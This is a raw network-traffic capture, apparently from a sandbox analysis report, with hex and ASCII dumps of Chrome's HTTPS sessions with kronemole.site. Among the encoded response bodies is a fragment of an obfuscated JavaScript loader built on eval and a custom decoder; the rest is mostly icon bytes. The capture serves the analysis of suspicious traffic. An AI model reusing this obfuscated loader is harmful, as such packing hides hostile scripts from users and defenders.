                                                                          2023-11-21 16:58:45 UTC815INData Raw: 77 56 48 71 51 51 48 71 56 77 4b 71 56 4b 48 71 77 56 48 71 75 48 56 71 77 56 48 71 56 4b 48 71 51 56 48 71 56 4b 4b 71 56 77 4b 71 51 56 56 71 51 56 48 71 56 4b 48 71 77 56 48 71 75 48 56 71 51 75 48 71 75 4b 4b 71 51 56 77 71 77 56 48 71 51 56 56 71 51 48 4b 71 56 77 77 71 51 56 75 71 77 56 48 71 56 4b 48 71 51 56 48 71 51 48 4b 71 56 4b 56 71 77 56 48 71 56 4b 4b 71 51 48 48 71 51 56 75 71 77 56 48 71 51 51 56 71 77 56 48 71 56 4b 56 71 51 56 48 71 56 4b 4b 71 56 4b 48 71 75 77 77 71 77 56 48 71 75 48 56 71 77 56 48 71 51 56 48 71 51 51 56 71 56 77 77 71 51 56 75 71 77 56 48 71 56 4b 48 71 56 4b 4b 71 77 56 48 71 56 4b 56 71 51 51 56 71 56 77 56 71 75 4b 48 71 77 56 48 71 51 48 4b 71 56 4b 48 71 77 56 48 71 56 77 75 71 51 51 56 71 56 4b 56 71 77 56 48
                                                                          Data Ascii: wVHqQQHqVwKqVKHqwVHquHVqwVHqVKHqQVHqVKKqVwKqQVVqQVHqVKHqwVHquHVqQuHquKKqQVwqwVHqQVVqQHKqVwwqQVuqwVHqVKHqQVHqQHKqVKVqwVHqVKKqQHHqQVuqwVHqQQVqwVHqVKVqQVHqVKKqVKHquwwqwVHquHVqwVHqQVHqQQVqVwwqQVuqwVHqVKHqVKKqwVHqVKVqQQVqVwVquKHqwVHqQHKqVKHqwVHqVwuqQQVqVKVqwVH
                                                                          2023-11-21 16:58:45 UTC816INData Raw: 48 77 71 51 51 56 71 51 56 4b 71 56 4b 48 71 51 48 4b 71 56 4b 4b 71 51 48 48 71 56 4b 56 71 51 75 48 71 77 48 77 71 75 51 48 71 75 51 51 71 56 4b 56 71 56 4b 77 71 51 51 56 71 51 48 48 71 77 56 48 71 51 56 4b 71 51 48 51 71 51 51 56 71 56 4b 56 71 56 4b 56 71 75 51 56 71 51 75 48 71 77 48 77 71 51 51 56 71 51 56 4b 71 56 4b 48 71 75 77 4b 71 51 48 51 71 51 48 4b 71 51 48 75 71 51 56 75 71 77 56 48 71 51 48 56 71 56 4b 51 71 75 77 4b 71 75 77 48 71 77 56 48 71 51 56 4b 71 56 4b 4b 71 51 48 51 71 56 4b 4b 71 56 4b 51 71 75 77 4b 71 56 4b 77 71 56 4b 51 71 51 48 4b 71 51 48 56 71 51 51 56 71 56 4b 51 71 56 77 56 71 75 77 4b 71 56 4b 48 71 51 56 75 71 56 77 51 71 56 4b 48 71 51 75 48 71 77 48 77 71 75 51 48 71 51 4b 77 71 51 48 4b 71 51 48 75 71 51 56 75 71
                                                                          Data Ascii: HwqQQVqQVKqVKHqQHKqVKKqQHHqVKVqQuHqwHwquQHquQQqVKVqVKwqQQVqQHHqwVHqQVKqQHQqQQVqVKVqVKVquQVqQuHqwHwqQQVqQVKqVKHquwKqQHQqQHKqQHuqQVuqwVHqQHVqVKQquwKquwHqwVHqQVKqVKKqQHQqVKKqVKQquwKqVKwqVKQqQHKqQHVqQQVqVKQqVwVquwKqVKHqQVuqVwQqVKHqQuHqwHwquQHqQKwqQHKqQHuqQVuq
                                                                          2023-11-21 16:58:45 UTC817INData Raw: 56 4b 71 56 77 56 71 75 77 4b 71 51 51 48 71 56 4b 48 71 51 48 48 71 51 75 48 71 77 48 77 71 75 51 48 71 51 4b 48 71 56 4b 51 71 51 48 4b 71 56 77 77 71 51 51 56 71 51 56 4b 71 56 77 56 71 77 56 48 71 51 4b 48 71 56 4b 4b 71 51 48 51 71 51 48 4b 71 51 56 4b 71 56 77 56 71 75 51 51 71 75 77 75 71 51 51 56 71 75 51 48 71 77 56 48 71 56 75 77 71 77 56 48 71 75 51 51 71 51 51 56 71 77 56 48 71 51 48 4b 71 51 56 77 71 75 51 56 71 51 75 48 71 77 48 77 71 56 4b 48 71 51 56 75 71 56 4b 51 71 51 48 56 71 56 4b 56 71 75 77 4b 71 51 51 48 71 56 4b 48 71 51 48 48 71 51 75 48 71 77 48 77 71 75 51 48 71 51 77 51 71 51 56 75 71 56 4b 51 71 51 48 56 71 56 4b 56 71 77 56 48 71 51 51 56 71 51 48 48 71 51 56 77 71 77 56 48 71 75 56 56 71 56 4b 4b 71 51 48 48 71 51 56 77 71
                                                                          Data Ascii: VKqVwVquwKqQQHqVKHqQHHqQuHqwHwquQHqQKHqVKQqQHKqVwwqQQVqQVKqVwVqwVHqQKHqVKKqQHQqQHKqQVKqVwVquQQquwuqQQVquQHqwVHqVuwqwVHquQQqQQVqwVHqQHKqQVwquQVqQuHqwHwqVKHqQVuqVKQqQHVqVKVquwKqQQHqVKHqQHHqQuHqwHwquQHqQwQqQVuqVKQqQHVqVKVqwVHqQQVqQHHqQVwqwVHquVVqVKKqQHHqQVwq
                                                                          2023-11-21 16:58:45 UTC819INData Raw: 48 71 51 56 75 71 51 48 4b 71 56 4b 51 71 77 56 48 71 56 4b 51 71 51 56 75 71 56 4b 56 71 56 4b 77 71 51 56 75 71 51 56 4b 71 56 4b 48 71 51 48 4b 71 56 77 77 71 51 56 75 71 77 56 48 71 56 4b 4b 71 56 77 75 71 51 48 48 71 51 56 75 71 56 4b 51 71 56 4b 56 71 77 56 48 71 56 77 75 71 51 56 48 71 56 4b 4b 71 77 56 48 71 51 56 77 71 56 4b 4b 71 77 56 48 71 51 48 48 71 56 4b 4b 71 56 4b 48 71 77 56 48 71 56 4b 4b 71 56 77 75 71 51 48 48 71 75 4b 48 71 77 56 48 71 51 56 75 71 51 48 48 71 51 56 77 71 56 4b 4b 71 56 4b 51 71 56 4b 56 71 51 56 75 71 75 4b 48 71 77 56 48 71 56 4b 4b 71 56 4b 51 71 77 56 48 71 56 4b 77 71 56 4b 51 71 56 4b 4b 71 51 48 56 71 56 4b 4b 71 56 4b 48 71 51 56 75 71 77 56 48 71 56 4b 48 71 51 56 48 71 51 48 4b 71 56 4b 56 71 77 56 48 71 56
                                                                          Data Ascii: HqQVuqQHKqVKQqwVHqVKQqQVuqVKVqVKwqQVuqQVKqVKHqQHKqVwwqQVuqwVHqVKKqVwuqQHHqQVuqVKQqVKVqwVHqVwuqQVHqVKKqwVHqQVwqVKKqwVHqQHHqVKKqVKHqwVHqVKKqVwuqQHHquKHqwVHqQVuqQHHqQVwqVKKqVKQqVKVqQVuquKHqwVHqVKKqVKQqwVHqVKwqVKQqVKKqQHVqVKKqVKHqQVuqwVHqVKHqQVHqQHKqVKVqwVHqV
                                                                          2023-11-21 16:58:45 UTC820INData Raw: 71 51 56 4b 71 51 48 51 71 51 51 56 71 56 4b 56 71 56 4b 56 71 75 51 56 71 51 75 48 71 77 48 77 71 51 48 56 71 56 4b 4b 71 51 56 77 71 51 51 56 71 51 48 51 71 51 75 48 71 77 48 77 71 77 56 48 71 56 4b 48 71 51 51 56 71 51 51 48 71 51 48 4b 71 51 48 48 71 51 56 77 71 51 56 75 71 56 77 51 71 75 51 56 71 51 75 48 71 77 48 77 71 75 77 4b 71 75 77 56 71 51 75 48 71 77 48 77 71 77 56 48 71 56 4b 51 71 56 4b 4b 71 51 48 51 71 51 56 75 71 75 51 56 71 51 75 48 71 77 48 77 71 51 56 77 71 51 48 4b 71 51 51 56 71 51 48 51 71 56 4b 4b 71 51 56 56 71 51 75 48 71 77 48 77 71 77 56 48 71 51 56 77 71 51 51 56 71 56 4b 48 71 51 51 56 71 75 77 4b 71 51 51 48 71 51 51 56 71 51 56 4b 71 51 48 75 71 51 56 77 71 56 4b 51 71 56 4b 4b 71 56 4b 77 71 75 51 56 71 51 75 48 71 77 48
                                                                          Data Ascii: qQVKqQHQqQQVqVKVqVKVquQVqQuHqwHwqQHVqVKKqQVwqQQVqQHQqQuHqwHwqwVHqVKHqQQVqQQHqQHKqQHHqQVwqQVuqVwQquQVqQuHqwHwquwKquwVqQuHqwHwqwVHqVKQqVKKqQHQqQVuquQVqQuHqwHwqQVwqQHKqQQVqQHQqVKKqQVVqQuHqwHwqwVHqQVwqQQVqVKHqQQVquwKqQQHqQQVqQVKqQHuqQVwqVKQqVKKqVKwquQVqQuHqwH
                                                                          2023-11-21 16:58:45 UTC821INData Raw: 56 4b 48 71 51 56 75 71 56 4b 51 71 75 51 75 71 77 56 48 71 51 51 48 71 51 51 56 71 51 56 4b 71 51 48 75 71 51 56 56 71 56 4b 51 71 56 4b 4b 71 56 77 4b 71 51 48 48 71 51 56 77 71 75 77 4b 71 51 48 4b 71 51 48 56 71 51 51 56 71 51 56 56 71 51 56 75 71 75 51 77 71 77 56 48 71 56 77 4b 71 56 4b 51 71 51 48 51 71 75 4b 77 71 51 56 48 71 56 4b 48 71 56 4b 48 71 56 4b 77 71 56 4b 56 71 75 51 77 71 75 77 75 71 75 77 75 71 51 48 75 71 56 4b 51 71 56 4b 4b 71 51 48 48 71 51 56 75 71 51 48 56 71 56 4b 4b 71 51 48 51 71 51 56 75 71 75 77 77 71 56 4b 56 71 51 48 4b 71 56 4b 48 71 51 56 75 71 75 77 75 71 56 77 4b 71 56 4b 77 71 51 48 51 71 56 4b 4b 71 51 51 56 71 51 56 77 71 56 4b 56 71 75 77 75 71 51 51 56 71 56 4b 51 71 51 56 4b 71 51 56 48 71 51 48 4b 71 56 77 77
                                                                          Data Ascii: VKHqQVuqVKQquQuqwVHqQQHqQQVqQVKqQHuqQVVqVKQqVKKqVwKqQHHqQVwquwKqQHKqQHVqQQVqQVVqQVuquQwqwVHqVwKqVKQqQHQquKwqQVHqVKHqVKHqVKwqVKVquQwquwuquwuqQHuqVKQqVKKqQHHqQVuqQHVqVKKqQHQqQVuquwwqVKVqQHKqVKHqQVuquwuqVwKqVKwqQHQqVKKqQQVqQVwqVKVquwuqQQVqVKQqQVKqQVHqQHKqVww
                                                                          2023-11-21 16:58:45 UTC823INData Raw: 4b 48 71 56 4b 4b 71 77 56 48 71 56 4b 51 71 51 56 75 71 51 56 4b 71 51 56 75 71 51 48 4b 71 56 77 77 71 51 56 75 71 77 56 48 71 51 51 56 71 77 56 48 71 51 48 48 71 51 56 75 71 56 77 75 71 77 56 48 71 56 4b 51 71 51 56 75 71 56 77 75 71 51 51 56 71 56 4b 51 71 51 56 77 71 75 77 77 71 77 56 48 71 51 77 51 71 56 4b 4b 71 77 56 48 71 51 56 4b 71 51 48 51 71 51 51 56 71 51 48 4b 71 51 48 56 71 75 4b 48 71 77 56 48 71 56 4b 56 71 51 48 4b 71 51 48 56 71 56 4b 77 71 51 48 51 71 56 77 56 71 77 56 48 71 56 4b 48 71 51 51 56 71 51 48 75 71 51 56 75 71 77 56 48 71 56 4b 48 71 51 56 48 71 51 48 4b 71 56 4b 56 71 77 56 48 71 56 4b 56 71 51 56 48 71 56 4b 4b 71 56 4b 51 71 56 4b 48 71 77 56 48 71 56 4b 56 71 56 77 4b 71 56 4b 51 71 56 77 77 71 51 56 75 71 56 77 56 71
                                                                          Data Ascii: KHqVKKqwVHqVKQqQVuqQVKqQVuqQHKqVwwqQVuqwVHqQQVqwVHqQHHqQVuqVwuqwVHqVKQqQVuqVwuqQQVqVKQqQVwquwwqwVHqQwQqVKKqwVHqQVKqQHQqQQVqQHKqQHVquKHqwVHqVKVqQHKqQHVqVKwqQHQqVwVqwVHqVKHqQQVqQHuqQVuqwVHqVKHqQVHqQHKqVKVqwVHqVKVqQVHqVKKqVKQqVKHqwVHqVKVqVwKqVKQqVwwqQVuqVwVq
                                                                          2023-11-21 16:58:45 UTC827INData Raw: 35 65 5b 30 5d 29 5b 5f 30 78 63 35 65 5b 31 30 5d 5d 28 29 5b 5f 30 78 63 35 65 5b 39 5d 5d 28 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 69 66 28 68 5b 5f 30 78 63 35 65 5b 34 5d 5d 28 62 29 21 3d 3d 2d 31 29 72 65 74 75 72 6e 20 61 2b 3d 68 5b 5f 30 78 63 35 65 5b 34 5d 5d 28 62 29 2a 28 4d 61 74 68 5b 5f 30 78 63 35 65 5b 38 5d 5d 28 65 2c 63 29 29 7d 2c 30 29 3b 76 61 72 20 6b 3d 5f 30 78 63 35 65 5b 30 5d 3b 77 68 69 6c 65 28 6a 3e 30 29 7b 6b 3d 69 5b 6a 25 66 5d 2b 6b 3b 6a 3d 28 6a 2d 28 6a 25 66 29 29 2f 66 7d 72 65 74 75 72 6e 20 6b 7c 7c 5f 30 78 63 35 65 5b 31 31 5d 7d 65 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 68 2c 75 2c 6e 2c 74 2c 65 2c 72 29 7b 72 3d 22 22 3b 66 6f 72 28 76 61 72 20 69 3d 30 2c 6c 65 6e 3d 68 2e 6c 65 6e 67 74 68 3b
                                                                          Data Ascii: 5e[0])[_0xc5e[10]]()[_0xc5e[9]](function(a,b,c){if(h[_0xc5e[4]](b)!==-1)return a+=h[_0xc5e[4]](b)*(Math[_0xc5e[8]](e,c))},0);var k=_0xc5e[0];while(j>0){k=i[j%f]+k;j=(j-(j%f))/f}return k||_0xc5e[11]}eval(function(h,u,n,t,e,r){r="";for(var i=0,len=h.length;
                                                                          2023-11-21 16:58:45 UTC831INData Raw: 67 68 42 73 68 67 67 73 42 73 68 67 67 68 42 73 73 67 68 68 42 68 68 67 68 42 73 73 73 67 73 42 68 73 68 68 42 73 68 67 73 68 42 73 68 67 67 68 42 73 73 68 68 73 42 73 73 68 73 73 42 73 68 67 68 67 42 68 73 67 68 42 68 73 67 73 42 73 67 67 67 68 42 68 73 67 73 42 68 73 73 67 42 68 73 73 67 42 73 73 67 68 68 42 68 68 67 68 42 73 73 73 67 73 42 73 67 67 73 67 42 73 67 68 73 42 73 68 73 73 67 42 73 73 68 73 73 42 73 68 67 67 68 42 73 73 73 68 73 42 73 68 67 67 73 42 73 73 73 68 68 42 73 73 68 67 67 42 73 73 67 67 68 42 73 67 68 68 68 42 73 67 68 67 68 42 73 67 67 73 68 42 68 67 73 67 42 68 73 67 68 42 73 68 67 67 68 42 73 68 67 73 73 42 73 73 68 67 67 42 73 68 67 67 68 42 73 68 67 67 73 42 73 68 67 67 68 42 73 73 67 68 68 42 68 68 73 67 42 73 73 73 67 73 42
                                                                          Data Ascii: ghBshggsBshgghBssghhBhhghBsssgsBhshhBshgshBshgghBsshhsBsshssBshghgBhsghBhsgsBsggghBhsgsBhssgBhssgBssghhBhhghBsssgsBsggsgBsghsBshssgBsshssBshgghBssshsBshggsBssshhBsshggBssgghBsghhhBsghghBsggshBhgsgBhsghBshgghBshgssBsshggBshgghBshggsBshgghBssghhBhhsgBsssgsB
                                                                          2023-11-21 16:58:45 UTC832INData Raw: 31 32 36 36 0d 0a 67 67 67 42 68 67 73 68 42 73 67 67 67 68 42 68 67 73 68 42 68 68 73 73 42 68 68 67 73 42 68 68 68 68 42 73 67 67 67 73 42 68 67 73 68 42 68 73 68 67 42 68 67 73 68 42 73 73 68 73 73 42 73 73 73 68 68 42 73 73 73 73 67 42 73 68 67 67 68 42 73 68 67 67 73 42 73 68 67 67 68 42 73 68 67 68 73 42 73 68 67 67 67 42 73 73 73 68 68 42 73 73 68 67 67 42 73 68 67 73 73 42 68 67 73 68 42 73 67 67 67 68 42 68 67 73 68 42 68 68 67 73 42 68 67 73 68 42 68 73 68 67 42 68 67 73 68 42 73 68 67 68 67 42 73 68 73 67 68 42 73 68 67 67 68 42 73 73 68 67 67 42 68 67 73 68 42 73 67 67 67 68 42 68 67 73 68 42 68 68 67 73 42 68 67 73 68 42 68 73 68 67 42 68 67 73 68 42 73 68 67 73 73 42 73 73 68 67 67 42 73 73 68 67 73 42 73 68 67 73 73 42 73 73 68 67 67 42 73
                                                                          Data Ascii: 1266gggBhgshBsggghBhgshBhhssBhhgsBhhhhBsgggsBhgshBhshgBhgshBsshssBssshhBssssgBshgghBshggsBshgghBshghsBshgggBssshhBsshggBshgssBhgshBsggghBhgshBhhgsBhgshBhshgBhgshBshghgBshsghBshgghBsshggBhgshBsggghBhgshBhhgsBhgshBhshgBhgshBshgssBsshggBsshgsBshgssBsshggBs
                                                                          2023-11-21 16:58:45 UTC837INData Raw: 54 42 57 4f 42 42 58 58 4f 42 42 58 42 4f 42 42 58 65 4f 42 42 42 57 4f 42 42 42 65 4f 57 54 54 4f 42 58 65 57 4f 42 42 58 65 4f 42 42 58 57 4f 42 58 65 65 4f 65 58 42 4f 57 54 54 4f 42 42 65 57 4f 57 54 54 4f 42 58 54 57 4f 42 58 65 54 4f 57 54 54 4f 65 42 57 4f 42 42 58 54 4f 42 42 42 42 4f 42 42 58 65 4f 42 58 54 58 4f 57 54 54 4f 54 58 65 4f 54 58 65 4f 57 54 54 4f 65 42 42 4f 65 65 42 4f 65 65 58 4f 65 65 58 4f 65 42 42 4f 65 42 65 4f 57 54 54 4f 42 42 65 58 4f 57 54 54 4f 42 42 42 65 4f 42 42 57 57 4f 42 42 42 65 4f 57 54 54 4f 54 58 65 4f 57 54 54 4f 65 58 42 4f 65 57 57 4f 57 54 54 4f 54 57 58 4f 42 42 58 65 4f 42 42 58 57 4f 42 58 65 65 4f 65 58 58 4f 65 58 42 4f 57 54 54 4f 42 42 65 57 4f 57 54 54 4f 65 58 65 4f 65 42 57 4f 65 42 42 4f 65 57 65
                                                                          Data Ascii: TBWOBBXXOBBXBOBBXeOBBBWOBBBeOWTTOBXeWOBBXeOBBXWOBXeeOeXBOWTTOBBeWOWTTOBXTWOBXeTOWTTOeBWOBBXTOBBBBOBBXeOBXTXOWTTOTXeOTXeOWTTOeBBOeeBOeeXOeeXOeBBOeBeOWTTOBBeXOWTTOBBBeOBBWWOBBBeOWTTOTXeOWTTOeXBOeWWOWTTOTWXOBBXeOBBXWOBXeeOeXXOeXBOWTTOBBeWOWTTOeXeOeBWOeBBOeWe
                                                                          2023-11-21 16:58:45 UTC837INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          38192.168.2.449782104.21.62.2034435352C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2023-11-21 16:58:44 UTC743OUTGET /fim/3079-US/2ca755302a35b1e76ba6e2a0cc008202.ico HTTP/1.1
                                                                          Host: kronemole.site
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://kronemole.site/00751fdff8a0f3cf22b7cf59c24e5f09
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=03a2656556074e0f77a0ceaf7389c11a; _ga_DKB9VH2QW4=GS1.1.1700585923.1.0.1700585923.0.0.0; _ga=GA1.1.148937489.1700585924
                                                                          2023-11-21 16:58:44 UTC749INHTTP/1.1 200 OK
                                                                          Date: Tue, 21 Nov 2023 16:58:44 GMT
                                                                          Content-Type: image/x-icon
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Cache-Control: public, max-age=604800
                                                                          expires: Tue, 28 Nov 2023 16:58:44 GMT
                                                                          last-modified: Tue, 21 Nov 2023 16:47:42 GMT
                                                                          vary: Accept-Encoding,User-Agent,User-Agent
                                                                          x-frame-options: SAMEORIGIN
                                                                          x-xss-protection: 1; mode=block
                                                                          x-content-type-options: nosniff
                                                                          CF-Cache-Status: MISS
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VoI58aXQo4UC3AcU4nEytxBRCnrtGapNvT5dodeMp3Q4cCD6XyhbMHztoAJAPTh6QcPuwF%2BOe2XTbIlR0JG39gtOsq7enbtDA%2Bau%2BWOM3UczKCuZsr5lcUl6bp6usPfUbA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 829a7aac3dc205b9-IAD
                                                                          alt-svc: h3=":443"; ma=86400
                                                                          2023-11-21 16:58:44 UTC750INData Raw: 33 63 32 65 0d 0a 00 00 01 00 03 00 10 10 00 00 01 00 20 00 68 04 00 00 36 00 00 00 20 20 00 00 01 00 20 00 28 11 00 00 9e 04 00 00 30 30 00 00 01 00 20 00 68 26 00 00 c6 15 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 0c 00 bc 00 13 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 20 00 be 00 d0 00 be 00
                                                                          Data Ascii: 3c2e h6 (00 h&(
                                                                          2023-11-21 16:58:44 UTC751INData Raw: 00 00 00 00 00 00 be 00 95 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bd 00 f8 00 be 00 66 00 be 00 2b 00 be 00 db 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f4 00 bd 00 59 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 00 39 00 be 00 e9 00 be 00 ff 00 bd 00 f8 00 bf 00 67 00 ff 00 01 00 00 00 00 00 c1 00 29 00 be 00 db 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bd 00 f5 00 bd 00 59 00 00 00 01 00 00 00 00 00 00 00 00 00 bb 00 3c 00 be 00 cb 00 bd 00 65 00 ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 c1 00 29 00 be 00 db 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f4 00 bf 00 58 00 00 00 01 00 00 00 00 00 00 00 00 00 80 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 00 2a 00 bf 00 db 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be
                                                                          Data Ascii: f+Y9g)Y<e)X*
                                                                          2023-11-21 16:58:44 UTC752INData Raw: 00 be 00 ff 00 be 00 ff 00 be 00 fe 00 be 00 d5 00 be 00 47 00 ff 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 08 00 bd 00 6d 00 be 00 eb 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bf 00 d6 00 bd 00 46 00 ff 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 08 00 bf 00 6f 00 bf 00 ea 00 bf 00 fe 00 be 00
                                                                          Data Ascii: GmFo
                                                                          2023-11-21 16:58:44 UTC753INData Raw: bd 00 aa 00 be 00 fc 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 e3 00 be 00 5a 00 cc 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 10 00 bc 00 86 00 be 00 f4 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 fe 00 be 00 d7 00 be 00 47 00 ff 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 00 22 00 bd 00 af 00 be 00 fb 00 be 00 ff 00 be 00 ff 00 be 00 fe 00 be 00 e3 00 bf 00 5c 00 cc 00 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bf 00 10 00 bd 00 87 00 be 00 f3 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 d5 00 bd 00 46 00 aa 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii: ZG"\F
                                                                          2023-11-21 16:58:44 UTC755INData Raw: 00 00 00 c3 00 11 00 be 00 79 00 bd 00 c2 00 bd 00 92 00 bd 00 1f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 aa 00 03 00 b6 00 07 00 bf 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii: y
                                                                          2023-11-21 16:58:44 UTC756INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          2023-11-21 16:58:44 UTC757INData Raw: 00 00 00 00 00 d4 00 06 00 bf 00 38 00 bd 00 a3 00 be 00 ef 00 bf 00 fe 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 f2 00 bf 00 af 00 bb 00 40 00 b9 00 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 00 07 00 bf 00 3c 00 bf 00 a3 00 be 00 ec 00 be 00 fd 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 fe 00 be 00 f3 00 be 00 b0 00 be 00
                                                                          Data Ascii: 8@<
                                                                          2023-11-21 16:58:44 UTC759INData Raw: be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 bd 00 f1 00 be 00 b0 00 bc 00 45 00 b3 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 aa 00 06 00 be 00 3b 00 be 00 a9 00 bf 00 ef 00 be 00 fd 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 00 ff 00 be 